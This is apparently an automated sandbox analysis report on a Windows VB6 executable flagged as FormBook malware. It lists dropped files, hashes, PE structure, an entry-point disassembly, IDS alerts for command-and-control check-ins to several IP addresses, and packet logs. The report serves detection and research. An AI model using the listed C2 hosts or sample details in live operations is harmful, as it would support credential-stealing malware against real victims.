                                                                                                                                                    Preview: SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    Process:C:\Windows\explorer.exe
                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):143360
                                                                                                                                                    Entropy (8bit):6.015718830852235
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:Ee3Ennt9/+Ij6lRR8TLCEUOy+aIGlmkf7qsdTeca/6AJqSkORq+VGoOvZr8ziyNB:xEztQG/pajY67qqKRkFOw+U5m/SQ
                                                                                                                                                    MD5:75A9A6347C5AE5D8BD464C195B9802BB
                                                                                                                                                    SHA1:96DA47F0E279F810714AFDC362C15F2E0EAE6DD7
                                                                                                                                                    SHA-256:02854EF9C13129F6336DB1B1D33B5255A88A5657B5E66EBDA12B733A2C421FF7
                                                                                                                                                    SHA-512:B51BD3700E6959D56DBF5B1BD0CC0CF3E9DCCFC664630C69536F5492D21D67D4054B24003D7918E75811A108DFA104DE04252A3BF3B1849B3B5BDB9BA9003A35
                                                                                                                                                    Malicious:true
                                                                                                                                                    Antivirus:
                                                                                                                                                    • Antivirus: Metadefender, Detection: 11%, Browse
                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 9%
                                                                                                                                                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L.....Q.....................0....................@..........................@..............................................T...(....0..>...................................................................8... ....................................text............................... ..`.data...............................@....rsrc...>....0....... ..............@..@...I............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF0A1C6DEBC6BEE485.TMP
                                                                                                                                                    Process:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16384
                                                                                                                                                    Entropy (8bit):0.8889429216618719
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:rl3lKFQCb77aqWPp8aFW3gJH6OXkDgIOJefKadcMqpwbmHZbGzJzzz/jP5prGI:rQYH6OCgLAMibm5bGzJzX/
                                                                                                                                                    MD5:E114AD50630A185807BCDFF5F7DACEF6
                                                                                                                                                    SHA1:5091C562986C0A729FF4AC836083EFFBB4257977
                                                                                                                                                    SHA-256:8C0B8DE53510102223758C6543D9EB102BC7423B83BDF902975FB221AB77E945
                                                                                                                                                    SHA-512:F8C4FA0ABA5BD5CE8246A9C2A0A525129B5461E90634FE406A1704F8E42240174C6D1D8CCBC42EBE14EE777F79A5C7E32618CC2ED532CA6264D614337840BF1A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF0C461363B08A4B7D.TMP
                                                                                                                                                    Process:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16384
                                                                                                                                                    Entropy (8bit):0.8889429216618719
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:rl3lKFQCb77aqWPp8aFW3gJH6OXkDgIOJefKadcMqpwbmHZbGzJzzz/jP5prGI:rQYH6OCgLAMibm5bGzJzX/
                                                                                                                                                    MD5:E114AD50630A185807BCDFF5F7DACEF6
                                                                                                                                                    SHA1:5091C562986C0A729FF4AC836083EFFBB4257977
                                                                                                                                                    SHA-256:8C0B8DE53510102223758C6543D9EB102BC7423B83BDF902975FB221AB77E945
                                                                                                                                                    SHA-512:F8C4FA0ABA5BD5CE8246A9C2A0A525129B5461E90634FE406A1704F8E42240174C6D1D8CCBC42EBE14EE777F79A5C7E32618CC2ED532CA6264D614337840BF1A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF3A772AC6F37DE022.TMP
                                                                                                                                                    Process:C:\Users\user\Desktop\BL_CI_PL.exe
                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16384
                                                                                                                                                    Entropy (8bit):0.8889429216618719
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:rl3lKFQCb77aqWPp8aFW3gJH6OXkDgIOJefKadcMqpwbmHZbGzJzzz/jP5prGI:rQYH6OCgLAMibm5bGzJzX/
                                                                                                                                                    MD5:E114AD50630A185807BCDFF5F7DACEF6
                                                                                                                                                    SHA1:5091C562986C0A729FF4AC836083EFFBB4257977
                                                                                                                                                    SHA-256:8C0B8DE53510102223758C6543D9EB102BC7423B83BDF902975FB221AB77E945
                                                                                                                                                    SHA-512:F8C4FA0ABA5BD5CE8246A9C2A0A525129B5461E90634FE406A1704F8E42240174C6D1D8CCBC42EBE14EE777F79A5C7E32618CC2ED532CA6264D614337840BF1A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF94D0DD0995ECDEC7.TMP
                                                                                                                                                    Process:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16384
                                                                                                                                                    Entropy (8bit):0.8889429216618719
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:rl3lKFQCb77aqWPp8aFW3gJH6OXkDgIOJefKadcMqpwbmHZbGzJzzz/jP5prGI:rQYH6OCgLAMibm5bGzJzX/
                                                                                                                                                    MD5:E114AD50630A185807BCDFF5F7DACEF6
                                                                                                                                                    SHA1:5091C562986C0A729FF4AC836083EFFBB4257977
                                                                                                                                                    SHA-256:8C0B8DE53510102223758C6543D9EB102BC7423B83BDF902975FB221AB77E945
                                                                                                                                                    SHA-512:F8C4FA0ABA5BD5CE8246A9C2A0A525129B5461E90634FE406A1704F8E42240174C6D1D8CCBC42EBE14EE777F79A5C7E32618CC2ED532CA6264D614337840BF1A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DFA0B02BA84DC15ADD.TMP
                                                                                                                                                    Process:C:\Program Files (x86)\T5jfdetbp\k4n8p7lb.exe
                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):16384
                                                                                                                                                    Entropy (8bit):0.8889429216618719
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:12:rl3lKFQCb77aqWPp8aFW3gJH6OXkDgIOJefKadcMqpwbmHZbGzJzzz/jP5prGI:rQYH6OCgLAMibm5bGzJzX/
                                                                                                                                                    MD5:E114AD50630A185807BCDFF5F7DACEF6
                                                                                                                                                    SHA1:5091C562986C0A729FF4AC836083EFFBB4257977
                                                                                                                                                    SHA-256:8C0B8DE53510102223758C6543D9EB102BC7423B83BDF902975FB221AB77E945
                                                                                                                                                    SHA-512:F8C4FA0ABA5BD5CE8246A9C2A0A525129B5461E90634FE406A1704F8E42240174C6D1D8CCBC42EBE14EE777F79A5C7E32618CC2ED532CA6264D614337840BF1A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview: ......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                    Static File Info

                                                                                                                                                    General

                                                                                                                                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                    Entropy (8bit):6.015718830852235
                                                                                                                                                    TrID:
                                                                                                                                                    • Win32 Executable (generic) a (10002005/4) 99.15%
                                                                                                                                                    • Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81%
                                                                                                                                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                    • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                    File name:BL_CI_PL.exe
                                                                                                                                                    File size:143360
                                                                                                                                                    MD5:75a9a6347c5ae5d8bd464c195b9802bb
                                                                                                                                                    SHA1:96da47f0e279f810714afdc362c15f2e0eae6dd7
                                                                                                                                                    SHA256:02854ef9c13129f6336db1b1d33b5255a88a5657b5e66ebda12b733a2c421ff7
                                                                                                                                                    SHA512:b51bd3700e6959d56dbf5b1bd0cc0cf3e9dccfc664630c69536f5492d21d67d4054b24003d7918e75811a108dfa104de04252a3bf3b1849b3b5bdb9ba9003a35
                                                                                                                                                    SSDEEP:1536:Ee3Ennt9/+Ij6lRR8TLCEUOy+aIGlmkf7qsdTeca/6AJqSkORq+VGoOvZr8ziyNB:xEztQG/pajY67qqKRkFOw+U5m/SQ
                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......7b..s...s...s.......r...<!..v...E%..r...Richs...........................PE..L......Q.....................0....................@

                                                                                                                                                    File Icon

                                                                                                                                                    Icon Hash:28f0da9af0f0f034

                                                                                                                                                    Static PE Info

                                                                                                                                                    General

                                                                                                                                                    Entrypoint:0x4016a4
                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                    Digitally signed:false
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                    Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                                                                                                    DLL Characteristics:
                                                                                                                                                    Time Stamp:0x518DF11A [Sat May 11 07:19:54 2013 UTC]
                                                                                                                                                    TLS Callbacks:
                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                    OS Version Major:4
                                                                                                                                                    OS Version Minor:0
                                                                                                                                                    File Version Major:4
                                                                                                                                                    File Version Minor:0
                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                    Import Hash:9b824bd6da8a9367fa6d96e7ab5dc79d

                                                                                                                                                    Entrypoint Preview

                                                                                                                                                    Instruction
                                                                                                                                                    push 0040248Ch
                                                                                                                                                    call 00007F2F94657165h
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    xor byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    cmp byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    retn 7DB9h
                                                                                                                                                    rol dword ptr [edx-4FB66314h], cl
                                                                                                                                                    lahf
                                                                                                                                                    adc al, 30h
                                                                                                                                                    xor dl, byte ptr [ecx+7Ah]
                                                                                                                                                    wait
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add dword ptr [eax], eax
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    dec eax
                                                                                                                                                    bound esi, dword ptr fs:[di]
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add byte ptr [eax], al
                                                                                                                                                    add bh, bh
                                                                                                                                                    int3
                                                                                                                                                    xor dword ptr [eax], eax
                                                                                                                                                    sub eax, EEFC9A4Dh
                                                                                                                                                    mov esp, 8C4190F1h
                                                                                                                                                    cmc
                                                                                                                                                    int C3h

                                                                                                                                                    Data Directories

                                                                                                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x1ff540x28.text
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x230000xf3e.rsrc
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x2380x20
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x10000x21c.text
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                    Sections

                                                                                                                                                    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                    .text0x10000x1f5fc0x20000False0.545219421387data6.27115768408IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .data0x210000x19ec0x1000False0.00634765625data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                                                    .rsrc0x230000xf3e0x1000False0.274658203125data3.57168530772IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                                                    Resources

                                                                                                                                                    NameRVASizeTypeLanguageCountry
                                                                                                                                                    CUSTOM0x239c00x57eMS Windows icon resource - 1 icon, 16x16, 8 bits/pixelEnglishUnited States
                                                                                                                                                    RT_ICON0x234580x568GLS_BINARY_LSB_FIRST
                                                                                                                                                    RT_GROUP_ICON0x234440x14data
                                                                                                                                                    RT_VERSION0x231400x304dataEnglishUnited States

                                                                                                                                                    Imports

                                                                                                                                                    DLLImport
                                                                                                                                                    MSVBVM60.DLL__vbaVarTstGt, _CIcos, _adj_fptan, __vbaHresultCheck, __vbaAryMove, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaStrCat, __vbaHresultCheckObj, __vbaLenBstrB, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR8, __vbaVarTstLt, _CIsin, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaGet3, __vbaVarTstEq, __vbaAryConstruct2, __vbaObjVar, _adj_fpatan, __vbaStrR8, EVENT_SINK_Release, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, __vbaVarCat, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaVar2Vec, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaI4Var, __vbaVarDup, __vbaFpI4, _CIatan, __vbaStrMove, __vbaAryCopy, __vbaR8IntI4, _allmul, _CItan, _CIexp, __vbaFreeStr, __vbaFreeObj

                                                                                                                                                    Version Infos

                                                                                                                                                    DescriptionData
                                                                                                                                                    Translation0x0409 0x04b0
                                                                                                                                                    LegalCopyrightBiSide Frak
                                                                                                                                                    InternalNamegadehan
                                                                                                                                                    FileVersion1.00
                                                                                                                                                    CompanyNameBiSide Frak
                                                                                                                                                    LegalTrademarksBiSide Frak
                                                                                                                                                    CommentsBiSide Frak
                                                                                                                                                    ProductNameBiSide Frak
                                                                                                                                                    ProductVersion1.00
                                                                                                                                                    FileDescriptionBiSide Frak
                                                                                                                                                    OriginalFilenamegadehan.exe

                                                                                                                                                    Possible Origin

                                                                                                                                                    Language of compilation systemCountry where language is spokenMap
                                                                                                                                                    EnglishUnited States

                                                                                                                                                    Network Behavior

                                                                                                                                                    Snort IDS Alerts

                                                                                                                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                    11/29/21-14:07:16.667835TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981580192.168.11.20164.155.212.139
                                                                                                                                                    11/29/21-14:07:16.667835TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981580192.168.11.20164.155.212.139
                                                                                                                                                    11/29/21-14:07:16.667835TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981580192.168.11.20164.155.212.139
                                                                                                                                                    11/29/21-14:07:22.543446TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981680192.168.11.2035.244.144.199
                                                                                                                                                    11/29/21-14:07:22.543446TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981680192.168.11.2035.244.144.199
                                                                                                                                                    11/29/21-14:07:22.543446TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981680192.168.11.2035.244.144.199
                                                                                                                                                    11/29/21-14:07:39.005893TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981780192.168.11.20216.172.172.87
                                                                                                                                                    11/29/21-14:07:39.005893TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981780192.168.11.20216.172.172.87
                                                                                                                                                    11/29/21-14:07:39.005893TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981780192.168.11.20216.172.172.87
                                                                                                                                                    11/29/21-14:07:49.612411TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981980192.168.11.20172.120.157.187
                                                                                                                                                    11/29/21-14:07:49.612411TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981980192.168.11.20172.120.157.187
                                                                                                                                                    11/29/21-14:07:49.612411TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981980192.168.11.20172.120.157.187
                                                                                                                                                    11/29/21-14:08:05.340313TCP1201ATTACK-RESPONSES 403 Forbidden804982034.102.136.180192.168.11.20
                                                                                                                                                    11/29/21-14:08:30.765151TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982180192.168.11.2034.237.47.210
                                                                                                                                                    11/29/21-14:08:30.765151TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982180192.168.11.2034.237.47.210
                                                                                                                                                    11/29/21-14:08:30.765151TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982180192.168.11.2034.237.47.210
                                                                                                                                                    11/29/21-14:09:02.814063TCP1201ATTACK-RESPONSES 403 Forbidden804982634.102.136.180192.168.11.20
                                                                                                                                                    11/29/21-14:09:18.060453TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982780192.168.11.20216.172.172.87
                                                                                                                                                    11/29/21-14:09:18.060453TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982780192.168.11.20216.172.172.87
                                                                                                                                                    11/29/21-14:09:18.060453TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982780192.168.11.20216.172.172.87
                                                                                                                                                    11/29/21-14:09:28.412970TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982980192.168.11.20172.120.157.187
                                                                                                                                                    11/29/21-14:09:28.412970TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982980192.168.11.20172.120.157.187
                                                                                                                                                    11/29/21-14:09:28.412970TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982980192.168.11.20172.120.157.187
                                                                                                                                                    11/29/21-14:09:58.937306TCP1201ATTACK-RESPONSES 403 Forbidden804983234.102.136.180192.168.11.20
                                                                                                                                                    11/29/21-14:10:39.935796TCP2031453ET TROJAN FormBook CnC Checkin (GET)4983780192.168.11.2034.102.136.180
                                                                                                                                                    11/29/21-14:10:39.935796TCP2031449ET TROJAN FormBook CnC Checkin (GET)4983780192.168.11.2034.102.136.180
                                                                                                                                                    11/29/21-14:10:39.935796TCP2031412ET TROJAN FormBook CnC Checkin (GET)4983780192.168.11.2034.102.136.180
                                                                                                                                                    11/29/21-14:10:40.043905TCP1201ATTACK-RESPONSES 403 Forbidden804983734.102.136.180192.168.11.20
                                                                                                                                                    11/29/21-14:10:51.376867TCP1201ATTACK-RESPONSES 403 Forbidden804983881.2.194.128192.168.11.20
                                                                                                                                                    11/29/21-14:11:00.935765TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984180192.168.11.20172.67.201.232
                                                                                                                                                    11/29/21-14:11:00.935765TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984180192.168.11.20172.67.201.232
                                                                                                                                                    11/29/21-14:11:00.935765TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984180192.168.11.20172.67.201.232
                                                                                                                                                    11/29/21-14:11:17.042098TCP2031453ET TROJAN FormBook CnC Checkin (GET)4984780192.168.11.20216.172.172.87
                                                                                                                                                    11/29/21-14:11:17.042098TCP2031449ET TROJAN FormBook CnC Checkin (GET)4984780192.168.11.20216.172.172.87
                                                                                                                                                    11/29/21-14:11:17.042098TCP2031412ET TROJAN FormBook CnC Checkin (GET)4984780192.168.11.20216.172.172.87
                                                                                                                                                    11/29/21-14:11:27.640578TCP2031453ET TROJAN FormBook CnC Checkin (GET)4985180192.168.11.20172.120.157.187
                                                                                                                                                    11/29/21-14:11:27.640578TCP2031449ET TROJAN FormBook CnC Checkin (GET)4985180192.168.11.20172.120.157.187
                                                                                                                                                    11/29/21-14:11:27.640578TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985180192.168.11.20172.120.157.187
                                                                                                                                                    11/29/21-14:11:47.354580TCP1201ATTACK-RESPONSES 403 Forbidden804985534.102.136.180192.168.11.20
                                                                                                                                                    11/29/21-14:11:56.764424ICMP402ICMP Destination Unreachable Port Unreachable192.168.11.209.9.9.9
                                                                                                                                                    11/29/21-14:12:35.517215TCP2031453ET TROJAN FormBook CnC Checkin (GET)4986080192.168.11.20172.67.201.232
                                                                                                                                                    11/29/21-14:12:35.517215TCP2031449ET TROJAN FormBook CnC Checkin (GET)4986080192.168.11.20172.67.201.232
                                                                                                                                                    11/29/21-14:12:35.517215TCP2031412ET TROJAN FormBook CnC Checkin (GET)4986080192.168.11.20172.67.201.232

                                                                                                                                                    Network Port Distribution

                                                                                                                                                    TCP Packets

                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Nov 29, 2021 14:05:26.061789989 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.061852932 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.061991930 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.081192017 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.081231117 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.293881893 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.294055939 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.294081926 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.403577089 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.403665066 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.404397011 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.404529095 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.407727957 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.447885036 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.502588034 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.502665997 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.502743006 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.502787113 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.502818108 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.502830029 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.502979994 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.596537113 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.596784115 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.596824884 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.597178936 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.597342014 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.597421885 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.597453117 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.597801924 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.598031998 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.691570044 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.691823959 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.691869020 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.692605019 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.692789078 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.692917109 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.693284035 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.693444967 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.693514109 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.693536043 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.693938017 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.694099903 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.694160938 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.694183111 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.694586992 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.694756985 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.694834948 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.695200920 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.695375919 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.695398092 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.695470095 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.695492983 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.695866108 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.696083069 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.696113110 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.789525986 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.789834023 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.789978981 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.790143013 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.790252924 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.790819883 CET4434980720.124.109.2192.168.11.20
                                                                                                                                                    Nov 29, 2021 14:05:26.791054010 CET49807443192.168.11.2020.124.109.2
                                                                                                                                                    Nov 29, 2021 14:05:26.791182041 CET49807443192.168.11.2020.124.109.2
